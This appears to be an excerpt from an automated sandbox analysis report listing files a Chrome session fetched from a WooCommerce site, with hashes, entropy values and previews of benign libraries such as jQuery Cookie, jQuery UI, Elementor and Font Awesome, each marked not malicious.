                                                                                                          Preview:(()=>{"use strict";var t={d:(e,i)=>{for(var s in i)t.o(i,s)&&!t.o(e,s)&&Object.defineProperty(e,s,{enumerable:!0,get:i[s]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};function i(t){if(this.formData={},this.tree={},!(t instanceof FormData))return this;this.formData=t;const e=()=>{const t=new Map;return t.largestIndex=0,t.set=function(e,i){""===e?e=t.largestIndex++:/^[0-9]+$/.test(e)&&(e=parseInt(e),t.largestIndex<=e&&(t.largestIndex=e+1)),Map.prototype.set.call(t,e,i)},t};this.tree=e();const i=/^(?<name>[a-z][-a-z0-9_:]*)(?<array>(?:\[(?:[a-z][-a-z0-9_:]*|[0-9]*)\])*)/i;for(const[t,s]of this.formData){const o=t.match(i);if(o)if(""===o.groups.array)this.tree.set(o.groups.name,s);else{const t=[...o.groups.array.matchAll(/\[([a-z][-a-z0-9_:]*|[0-9]*)\]/gi)].map((([t,e])=>e));t.unshift(o.groups.name);const i=t.pop
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1241)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1392
                                                                                                          Entropy (8bit):5.270206775867599
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:NkMNLbUSHLXW1xo89Z4eXBOf019BNOG7tkYsPCqcZtkIiiApmCHjpiUtJmcDFP59:NkPSHLXF1eXkfEjpZqcrw9VHL+iQC
                                                                                                          MD5:4F8F624A1F37DED882A2E982A07ECE34
                                                                                                          SHA1:B1ADADACB1A2120B1579E731115F003C91167823
                                                                                                          SHA-256:6407A9FFC16173F1D3330525F44A332501D2ED672CF276371A6C5CE2C4B9EA1E
                                                                                                          SHA-512:329D62BC0F1B1A12B72EA3C7F3A94A45B706DBAE8887AFBBFA0D45A2AFA176BC06DF0D823C0850BC52C4CC254D61ADC82EF9F6517B8504752136FC49A76900DF
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1-wc.6.6.1
                                                                                                          Preview:/*!. * jQuery Cookie Plugin v1.4.1. * https://github.com/carhartl/jquery-cookie. *. * Copyright 2013 Klaus Hartl. * Released under the MIT license. */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(require("jquery")):e(jQuery)}(function(a){var o=/\+/g;function s(e){return x.raw?e:encodeURIComponent(e)}function m(e,n){e=x.raw?e:function(e){0===e.indexOf('"')&&(e=e.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{return e=decodeURIComponent(e.replace(o," ")),x.json?JSON.parse(e):e}catch(n){}}(e);return"function"==typeof n?n(e):e}var x=a.cookie=function(e,n,o){var i,t;if(n!==undefined&&"function"!=typeof n)return"number"==typeof(o=a.extend({},x.defaults,o)).expires&&(t=o.expires,(i=o.expires=new Date).setTime(+i+864e5*t)),document.cookie=[s(e),"=",(t=n,s(x.json?JSON.stringify(t):String(t))),o.expires?"; expires="+o.expires.toUTCString():"",o.path?"; path="+o.path:"",o.domain?"; domain="+o.domain:"",o.secure?"; secure":""].join(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3053
                                                                                                          Entropy (8bit):3.887265636358029
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:P/M8xKhcYZkrMgtpRkMMtMbpbM3PMVsnYtE8rY8Wysl+y2:P/jxKhcYSr1pRIUpbSP3YtzrY8WyVy2
                                                                                                          MD5:0624A076A8B15D2D238FB31043BED59C
                                                                                                          SHA1:A1F9ADBCB37555B3ADB1F59666CE22DB51658382
                                                                                                          SHA-256:CB8528F82C58653AB48A3C62C296C0E5B8483AB9D53A435D1372D401FD2A63D0
                                                                                                          SHA-512:CB7FA810802EBD7BF47EAA3CFC464F9793AAFE3767C662D2C211C9A12ED99F078090919D88F2BC0B17F56B237390D176A2621D408FBA2893C246AF2BECA12EB2
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.5.4
                                                                                                          Preview:(function ($) {. $.extend({. AdvanceWooDiscountRules: {. form: null,. product_id: null,. quantity: 0,. options: [],. target: null,. getDynamicDiscountPriceFromCartForm: function($form, $target, $options){. if (typeof $options !== 'undefined') {. this.options = $options;. }. if (typeof $target !== 'undefined') {. this.target = $target;. }. if (typeof $form !== 'undefined' && $form.is('form')) {. this.form = $form;. } else {. this.logError("Incorrect form provided");. }. this.product_id = this.getProductIdFromForm();.. this.quantity = this.getProductQuantityFromForm();. this.getDiscountPriceForProduct();. },. getDiscountPriceForProduct: function () {. if(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3235)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3236
                                                                                                          Entropy (8bit):5.1052025431203045
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:jJ/7zIQqjeNF3uFGPGFdMqmvYe8SMI7l/6k6Y5BbOoFTGvK2:jJTEBj8F3lPGFGvYWvx/dNDF4
                                                                                                          MD5:DBE4B3628220901277C0C4234475E5CB
                                                                                                          SHA1:C17291130BC11A7F39CE70FE869BF82946E7BE8B
                                                                                                          SHA-256:10A2CF3D16091FBC89CC987160B62093515CD31F0762A751775999311C7313F4
                                                                                                          SHA-512:5CB99FFF539C035311BC1D4C6188600F48FE8733034BA4C67C8AFCA0781E4A6CAD38FD3523A85EB2F936D21DC9A94D3653733ECFFE87881B502C447E9303E867
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:!function(t){var o=function(o,s){var e,i,r=!1,n=!1,a=!1,c={},f={to:"top",offset:0,effectsOffset:0,parent:!1,classes:{sticky:"sticky",stickyActive:"sticky-active",stickyEffects:"sticky-effects",spacer:"sticky-spacer"}},p=function(t,o,s){var e={},i=t[0].style;s.forEach(function(t){e[t]=void 0!==i[t]?i[t]:""}),t.data("css-backup-"+o,e)},l=function(t,o){return t.data("css-backup-"+o)},m=function(){p(e,"unsticky",["position","width","margin-top","margin-bottom","top","bottom"]);var t={position:"fixed",width:u(e,"width"),marginTop:0,marginBottom:0};t[i.to]=i.offset,t["top"===i.to?"bottom":"top"]="",e.css(t).addClass(i.classes.stickyActive)},d=function(){e.css(l(e,"unsticky")).removeClass(i.classes.stickyActive)},u=function(t,o,s){var e=getComputedStyle(t[0]),i=parseFloat(e[o]),r="height"===o?["top","bottom"]:["left","right"],n=[];return"border-box"!==e.boxSizing&&n.push("border","padding"),s&&n.push("margin"),n.forEach(function(t){r.forEach(function(o){i+=parseFloat(e[t+"-"+o])})}),i},y=func
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 30096, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):30096
                                                                                                          Entropy (8bit):7.993476328160492
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:gPq4yNbxRP//BQcbZslZfHIByi/JgkG2jeF6+fp77j+/I:gC46zfisafHIBBe2vGjiI
                                                                                                          MD5:5E3A4044EE4A46B65E2289F76EA1ECDA
                                                                                                          SHA1:1CD261CC685E2D003CBBBF6AF1FFDE0959934DCE
                                                                                                          SHA-256:7F0F781820C8DE56BD6699AC9570FF90634DE4EB5CCA7EF4B573BB90619E5A5D
                                                                                                          SHA-512:EEA79095306DB7796604FA130DF57432BBB565BC430CA832AE5DFE29D0E875830771D442C39D7983CB78022C99973B2A4213DE328862BE18164B6D42BF6C68F0
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://fonts.gstatic.com/s/mulish/v13/1Ptvg83HX_SGhgqk3wot.woff2
                                                                                                          Preview:wOF2......u........0..u..............................`...?HVAR.B.`?STAT.8'2..2/~....X.,..J.0..t.6.$..l. ..H..........t._......}...nl.;....*...`.. D.T...HNd.f.........,........V.f.y.9.....%..N...W&.".t....!= ...l.(SfBeXb."C.a..&K.G..........f.O.B...~#A./3..YA>..-\.v"9.3...E..w8.g...m..XG..Pl...#..`^[..G.^..p........._...k..U}..A}$....>.........H...'.#.......C.A.b|..Rs..+o<5...i..Q. ..<../..mS.J-...../BBH..D.1oig7.31:z..n:1ig...........H..._..`.......X.k..1..0.3.......2.........~{..A.b....{..."R)..%C,.D&.!...w.})@..E.w.)..;.b..ID3.'.~.y.....2.1..`.6..RJ.k...>d.....%[.Z.9.Y..|..=Q.-bw.~../..~ X..c.e..h..........'Y..%M.......?...F...u.y..g%._U^.U ..`.&J....Z.......Qr....6...-....a.2~.O*.J...D*.......v.....B.^I..)S....nJ..Z..._.@.2...:....dxo.J...A......V.n}.1..p....i~....!hE.r.:..A.i.5.M6U.T.;#...........E....o.+fc..B...Q..}(....~...9...6.s!..=.t..D...Nh..q.Iw..WX.+........<{.W.._9.qIo..`...4..~._.g.f..b...N'$J._...q..*...M....o.*...y5..........Hs.$..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1408
                                                                                                          Entropy (8bit):4.687391425904603
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:PCe7eNTqBzqF3QfcTxSnqI3x6qDDgFJZ8BBMSnUVDoFCSBag2E0ZEM7EMvsHW/QU:eTszWy1dYRFmTUVZIgdntsFF0Tt
                                                                                                          MD5:477AE0FE6FFF5413FCC27ABBC7F7A566
                                                                                                          SHA1:DE42E0AB48A87D6987409D4E6657A4E0E5B9B1E2
                                                                                                          SHA-256:3A4F210A8F780982DE629B46B3BCD1480B8F2217B74CFB7C5E3279A79AECD7A8
                                                                                                          SHA-512:04AECF611AA83C96250E7A1E2A469A7C3FF7477136EC98378CD7C5408EEA29F076A50B4A46E3501BA1F195F3D74515C1EBBAD2682CCDE66964EF744E92BA1250
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/color/css/html_types/color.css?ver=3.3.0
                                                                                                          Preview:.woof_sid_auto_shortcode .woof_container_color{..}...woof_sid_auto_shortcode .woof_container_inner_color{. padding: 9px;. background: #fff;. border-radius: 7px;. border-radius: 7px;.}..ul.woof_list_color li{. display: inline-block !important;.}..ul.woof_list_color li {. display: inline-block;. float: none !important;. margin: 3px 3px 0 0 !important;. padding: 0 !important;.}.ul.woof_list_color.woof_color_title_col li {. display: block;.}..woof_color_title_col li .woof_color_term {. display: inline-block;.}.ul.woof_list_color.woof_color_title_col li .woof_color_title{. display: inline-block;. height: 30px;. padding: 5px;. vertical-align: top;. font-size: 14px;.}..woof_color_title_col p:hover.woof_tooltip span.woof_tooltip_data {. bottom: 40px;.}...woof_color_term {. display: block;. width: 50px;. height: 50px;. border: 2px solid #eee;. padding: 2px;. background-clip: content-box;. color: #292f38;. font-size: 0;.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (372)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):9765
                                                                                                          Entropy (8bit):4.814774684621602
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:O/OjL3rn7jkJjYQw2HXlcIQCK0HTpNvYY6oRWYmi90Q:HN42YLR
                                                                                                          MD5:72E9B866AC4B28674A41F8535A512CCA
                                                                                                          SHA1:33CF8115AA16B4F6AA2C28494DBD5126839E80C0
                                                                                                          SHA-256:EA2B40344A11F515E346ED0622BFF12600F3CF80C35D02C538C9CE72E1E5F9EB
                                                                                                          SHA-512:EA5C3FD755F6A0E8B8F293847ADECFDE25876E97D76209235C097110309DB7F53253AD090D5EC5134EC96498CD60559F6D4CA497CE54191399B346FFC8F217CF
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=3.3.0
                                                                                                          Preview:/*!.Chosen, a Select Box Enhancer for jQuery and Prototype.by Patrick Filler for Harvest, http://getharvest.com..Version custom.Full source at https://github.com/harvesthq/chosen.Copyright (c) Harvest http://getharvest.com..MIT License, https://github.com/harvesthq/chosen/blob/master/LICENSE.md.This file is generated by `grunt build`, do not edit it by hand..*/.chosen-container{. position:relative;. display:inline-block;. vertical-align:middle;. font-size:13px;. user-select:none.}..chosen-container *{. box-sizing:border-box.}..chosen-container .chosen-drop{. position:absolute;. top:100%;. z-index:1010;. width:100%;. border:1px solid #aaa;. border-top:0;. background:#fff;. clip:rect(0,0,0,0);. clip-path:inset(100% 100%).}..chosen-container.chosen-with-drop .chosen-drop{. clip:auto;. clip-path:none.}..chosen-container a{. cursor:pointer.}..chosen-container .chosen-single .group-name,.chosen-container .search-choice .group-name{. ma
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (37635)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37674
                                                                                                          Entropy (8bit):5.189436479341472
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:2RxqDvxJMEa/mjV5rVehz8P8QEAzDc5GfTSebsvZiV1uUUPSz5oedXLf2v3x+FP0:2Rxq7xJMEairVnXEAzDc5ITSebsRiV16
                                                                                                          MD5:361105B44EBABAE341A9F5E44F85DB04
                                                                                                          SHA1:86C4A2C7D84E6D9D14927888AD60CBECB720C5B8
                                                                                                          SHA-256:33075D9D58CF7FBE468294E693402E85BB2D50F86EE5B42091E5190EEDD75AFC
                                                                                                          SHA-512:2A35C8768B4046274877D2D7FF0ED8C42946B22387C7F61A6D0F1C1B449A8E4D165FA7518E4A1691527E9116CE643C74A4577D8A9BA7417008895E20549BE7BE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! elementor - v3.6.1 - 23-03-2022 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{var i=n(7914);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s=i(n(8135));class _default extends elementorModules.ViewModule{constructor(...e){super(...e),this.documents={},this.initDocumentClasses(),this.attachDocumentsClasses()}getDefaultSettings(){return{selectors:{document:".elementor"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$documents:jQuery(e.document)}}initDocumentClasses(){this.documentClasses={base:s.default},elementorFrontend.hooks.doAction("elementor/frontend/documents-manager/init-classes",this)}addDocumentClass(e,t){this.documentClasses[e]=t}attachDocumentsClasses(){this.elements.$documents.each(((e,t)=>this.attachDocumentClass(jQuery(t))))}attachDocumentClass(e){const t=e.data(),n=t.elementorId,i=t.elementorType,s=this.documentClasses[i]||this.documentClasses.base;this.documents[n]=ne
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3248)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3428
                                                                                                          Entropy (8bit):5.036898941425704
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:NsrsSHC53AZPQYahLJfIBW8c68tfpLBlfPmTsbyDeUasJBW0uxavfGYDtheEeSr/:2rsdOQYQL6/cR3GT+DmBWfwvfL
                                                                                                          MD5:DD6A0D8D7B3E0AFBBC0BBB417DCC387B
                                                                                                          SHA1:0B38C782DA1C8ECC6BC7E854F8841FB9D2C86E35
                                                                                                          SHA-256:F36ADC07DB49E73C3FD3AEB4234D270725F07719706DD28DFC09657F2CFFE9D6
                                                                                                          SHA-512:E0963A8C2DE54CA9A29D2F3FB0ADF54946172E11589F0DA3DAFBF603B9F38C7A4A8A977465B0A9C32DA9D4127D916E60C390DEA1E17D55B3EDEE0B760401135C
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.3
                                                                                                          Preview:/*!. * jQuery UI Mouse 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../ie","../version","../widget"],e):e(jQuery)}(function(o){"use strict";var n=!1;return o(document).on("mouseup",function(){n=!1}),o.widget("ui.mouse",{version:"1.13.3",options:{cancel:"input, textarea, button, select, option",distance:1,delay:0},_mouseInit:function(){var t=this;this.element.on("mousedown."+this.widgetName,function(e){return t._mouseDown(e)}).on("click."+this.widgetName,function(e){if(!0===o.data(e.target,t.widgetName+".preventClickEvent"))return o.removeData(e.target,t.widgetName+".preventClickEvent"),e.stopImmediatePropagation(),!1}),this.started=!1},_mouseDestroy:function(){this.element.off("."+this.widgetName),this._mouseMoveDelegate&&this.document.off("mousemove."+this.widgetName,this._mouseMoveDelegate).of
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):56276
                                                                                                          Entropy (8bit):7.996360468628255
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:+ZRPBfAX1Bbq9fWutLreBsswqxl+o19vCl0yo5q4RqJ0W9waeus9Xqkugf:2RZAWPLSBsTinbVWOaeVYK
                                                                                                          MD5:7A5A0964CB47152346115D149138D641
                                                                                                          SHA1:491238B93FFC40569FC868CAACFE1845B7B1A801
                                                                                                          SHA-256:02DF25A49D5B76E0C3B36D448EA9E3E1E0B5D0B942DBB02E5313FFC09A157727
                                                                                                          SHA-512:E01FA4EB7BCF1DFCBA396255B6CE044A4F7C5B43B72066C28C8D5077B5A1AD60BD0BFF8EA953096614D121149E4D2AEEB5EE49058760A34ECE9515893836EC2E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://script.hotjar.com/modules.88d849cb19f0e6d87c26.js
                                                                                                          Preview:S.xS.e.C..h.Q...7.`. `...G.ts.@w.@\.z............}#..F`..N2.}H.-V.,.m#<#..U.5..k ./V)..;O.A/C.Y..w_.wE..?^|x..J.O;.Q(.'...Dr."8S.%l?.5j.<...5s|.9...:d.....M../v..\.~..........a!Gf.!.,.5j.M).=..-._....M.wu....?...-..F......I..i.NI......qkd.t...~.......S../K...Q...80`.s\v.....w.^.{..m.A;.Ll....`..,....Vk....GiC.bMXu..<.K2.I.W.O..w.5.^z.>.......b.eA..Rm.m.1r1"w\$..?Ms...:._D....{..C\.%8OH.C..../U..SI.........&o..QJN.,3...P.....h...R.?]-l.v+.G.YI..8....AC..<.h.C...v........sOxt.e%u...2..k....R....}]~_......$Y.m<../...$!..6|..7...O..LK..)s...$h..,....|y2..=.....vc.H.cB9=. i..u..g....ym...Z..3?@...fy.q.......2...b.....0.R..D.d.II.$E..........f .T. ..Ie.\...>J.6.Ym...U[..3[..0......f....[ku....]...R*%n....2'.Y....A.(6...x$t?..,P.U..6.r~.6..@.%..OY.e......J....B."......}.....I..B....k.Vr....9K..!.(.6...1M.Z.....2.1..){...................(.R.......C@....r.....v....C.-.5.*u*.....;Q.:....g..?b.$rh."^..3..Q.......M.&(..v....V.....S..N's.O..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2142), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2142
                                                                                                          Entropy (8bit):4.808937135056841
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:JWff/T6h2gjT6h2yb5FTRtJylRrW61kRaM+C:JYf/T6h2qT6h2yb5FT/JylA6YavC
                                                                                                          MD5:01ECAEF76CE84F4EDA93C650894E32A0
                                                                                                          SHA1:A4554B59D40FB24E38F93F12BCF6C86693F6950A
                                                                                                          SHA-256:7302959A3FEAC84B8F4145D7D2EBE16F817336B8A965C55C394173BAF4AED68C
                                                                                                          SHA-512:01F208D95342EC6852E7C2F5602D3188F2C2062DDAA2EAA68D531C944FA6329C8D5C291701A2F5E62C56255EF23B546BAD65673D4A14DA47738FDDF26A8AAF53
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:jQuery(function(_){return"undefined"!=typeof woocommerce_price_slider_params&&(_(document.body).on("price_slider_create price_slider_slide",function(e,r,i){_(".price_slider_amount span.from").html(accounting.formatMoney(r,{symbol:woocommerce_price_slider_params.currency_format_symbol,decimal:woocommerce_price_slider_params.currency_format_decimal_sep,thousand:woocommerce_price_slider_params.currency_format_thousand_sep,precision:woocommerce_price_slider_params.currency_format_num_decimals,format:woocommerce_price_slider_params.currency_format})),_(".price_slider_amount span.to").html(accounting.formatMoney(i,{symbol:woocommerce_price_slider_params.currency_format_symbol,decimal:woocommerce_price_slider_params.currency_format_decimal_sep,thousand:woocommerce_price_slider_params.currency_format_thousand_sep,precision:woocommerce_price_slider_params.currency_format_num_decimals,format:woocommerce_price_slider_params.currency_format})),_(document.body).trigger("price_slider_updated",[r,i])
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1668)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1834
                                                                                                          Entropy (8bit):5.438090839180011
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MVV/bOd+rBLmYaQXfyso2N8wBALiVkJI9H+oWU/Anzze6ibkcun2GZWkY5cQXBv3:EKQr3ys3DAL/I9ezpFiYefXdKik44Mz
                                                                                                          MD5:D0A6D8547C66B0D7B0172466558D1208
                                                                                                          SHA1:FF93916519C7B9483251F609E4D29F38C30A66E3
                                                                                                          SHA-256:3B1384FF918D4B7F95F9EE5C8FC388203DEDFF7344D3D96598C9562162788612
                                                                                                          SHA-512:48BB25B08BFCC9944CD1FC3BD039EA41D1A870F488971839F2891B91710F3FF9EB0B523AA7AB888BF9968BBBCA41A48761405ABBAFC6C6D24927C078049545B8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.6.6.1
                                                                                                          Preview:/*!. * JavaScript Cookie v2.1.4. * https://github.com/js-cookie/js-cookie. *. * Copyright 2006, 2015 Klaus Hartl & Fagner Brack. * Released under the MIT license. */.!function(e){var n,o,t=!1;"function"==typeof define&&define.amd&&(define(e),t=!0),"object"==typeof exports&&(module.exports=e(),t=!0),t||(n=window.Cookies,(o=window.Cookies=e()).noConflict=function(){return window.Cookies=n,o})}(function(){function m(){for(var e=0,n={};e<arguments.length;e++){var o,t=arguments[e];for(o in t)n[o]=t[o]}return n}return function e(C){function g(e,n,o){var t,r;if("undefined"!=typeof document){if(1<arguments.length){"number"==typeof(o=m({path:"/"},g.defaults,o)).expires&&((r=new Date).setMilliseconds(r.getMilliseconds()+864e5*o.expires),o.expires=r),o.expires=o.expires?o.expires.toUTCString():"";try{t=JSON.stringify(n),/^[\{\[]/.test(t)&&(n=t)}catch(l){}n=C.write?C.write(n,e):encodeURIComponent(String(n)).replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g,decodeURIComponent),e=(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2914
                                                                                                          Entropy (8bit):5.454731226636154
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:WocSyckCkOcKjCiKjyImm2PP/KOQpSIVOz2TjNB2PVT/ZQ+pAKLVp2mBKjEkvZLr:WocSyckCkOc4Ci4arPivLHMVTS+p/fBI
                                                                                                          MD5:FD6449587DFAF05DAA350E2834EFE720
                                                                                                          SHA1:05F47DD3212FC8DAB7A4A9BD99F712B3CFF8CA49
                                                                                                          SHA-256:2392F9C1DAEA3B76288DD76C196D119E65B0ADB41D6EEE0AA5859AA0D2DE21B3
                                                                                                          SHA-512:81B5A12C2CE15A2A8383AF43921CB02FE089BE86968661CF3DCF92A86F51D497AA373F47808ACDB33BE4D7324B37BE2B332A77B305AD495CD8A96147BD07D949
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:if ('undefined' === typeof BG_SHCE_USE_EFFECTS) {..BG_SHCE_USE_EFFECTS = '0';.} .if ('undefined' === typeof BG_SHCE_TOGGLE_SPEED) {..BG_SHCE_TOGGLE_SPEED = '0';.} .if ('undefined' === typeof BG_SHCE_TOGGLE_OPTIONS) {..BG_SHCE_TOGGLE_OPTIONS = 'swing';.}.if ('undefined' === typeof BG_SHCE_TOGGLE_EFFECT) {..BG_SHCE_TOGGLE_EFFECT = '';.}...function bgExpandCollapsedContent() {..var bgCollapseExpandItems = document.querySelectorAll('input[bg_collapse_expand]');....for ( i=0; i<bgCollapseExpandItems.length; i++) {......var showHideButton = document.getElementById('bg-showmore-action-'+bgCollapseExpandItems[i].value);....var hiddenContent = document.getElementById('bg-showmore-hidden-'+bgCollapseExpandItems[i].value);......if (showHideButton && hiddenContent) {....if (window.addEventListener) {.....showHideButton.addEventListener('click', function(event) {bgExpandCollapsedContentAction(event, this);} );....}....else {.....window.attachEvent("onclick", function(event) {bgExpandCollapsedConten
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (489)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):675
                                                                                                          Entropy (8bit):5.107395902267412
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:UJOc1Fa1YivPiKYiGAA3Y1+3AzhNV0De8A8CF5JRdL+KRWhJdsOw3AziNVy:ebGvPioGlG0G8A8Ct7L+KghT9qs
                                                                                                          MD5:144E43C3B3D8EA5B278C062C202C92F2
                                                                                                          SHA1:3C037057A419245849747B4762D09D88CAB66FC1
                                                                                                          SHA-256:9CD63B8CEA25045C14623C538D26752518A58C0C682795CE6AD3078976C65A37
                                                                                                          SHA-512:6A95FCAC537F2B1256F2B9E241B92FCEBB214372AFC841FEE2CCD3DD29E8E6CBDDAFA13F08FD1013CEB6C8478B04C5270AA2E4A3C41ABA01A4CEF592EEE35F15
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3
                                                                                                          Preview:/*!. * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.@font-face{font-family:"Font Awesome 5 Brands";font-style:normal;font-weight:400;font-display:block;src:url(../webfonts/fa-brands-400.eot);src:url(../webfonts/fa-brands-400.eot?#iefix) format("embedded-opentype"),url(../webfonts/fa-brands-400.woff2) format("woff2"),url(../webfonts/fa-brands-400.woff) format("woff"),url(../webfonts/fa-brands-400.ttf) format("truetype"),url(../webfonts/fa-brands-400.svg#fontawesome) format("svg")}.fab{font-family:"Font Awesome 5 Brands";font-weight:400}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):38464
                                                                                                          Entropy (8bit):4.6629541485587
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:70xoyX6PmEmcx2dCYxYYFOjJA0t4zwZVjL/:oxoA6OEmcLpyqVjj
                                                                                                          MD5:502B178B099ED4D72DB251553C569536
                                                                                                          SHA1:9CA686DE040692233D0B7213F26A7EDF3A130B7B
                                                                                                          SHA-256:8CA6D9CC1522A42C3F686EBB206F9820F3C53EF4A419D28455C0FBB31400F986
                                                                                                          SHA-512:E1E8DA37C3366176C9ECA54FD770DA092D1F64EA0D0943EE92A38CBA6AFCAF7D97CF5FF6C11C389C2289ACD993C6CB5F1F919FDA82DEDBB62900F890AF63A74D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.js?ver=1.5.0
                                                                                                          Preview:/*!. * perfect-scrollbar v1.5.0. * Copyright 2020 Hyunje Jun, MDBootstrap and Contributors. * Licensed under MIT. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :. typeof define === 'function' && define.amd ? define(factory) :. (global = global || self, global.PerfectScrollbar = factory());.}(this, (function () { 'use strict';.. function get(element) {. return getComputedStyle(element);. }.. function set(element, obj) {. for (var key in obj) {. var val = obj[key];. if (typeof val === 'number') {. val = val + "px";. }. element.style[key] = val;. }. return element;. }.. function div(className) {. var div = document.createElement('div');. div.className = className;. return div;. }.. var elMatches =. typeof Element !== 'undefined' &&. (Element.prototype.matches ||. Element.prototype.webkitMatchesSelector ||. Element.prototype.mozMatchesSele
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):942
                                                                                                          Entropy (8bit):4.559569809574579
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:YO/s4vd3CIdVbHtUvHlCdYORQ4I4hvH2QbLC6SW9CdYOy1bPI4y6vJkKynn:YO/s4V/VbHoYdYORQ4f2gZgdYOy5BkVn
                                                                                                          MD5:D686970628F1F892E760918CD5702B71
                                                                                                          SHA1:06344483B5C8889F7CCB45FC21BFB775D4C8C2BF
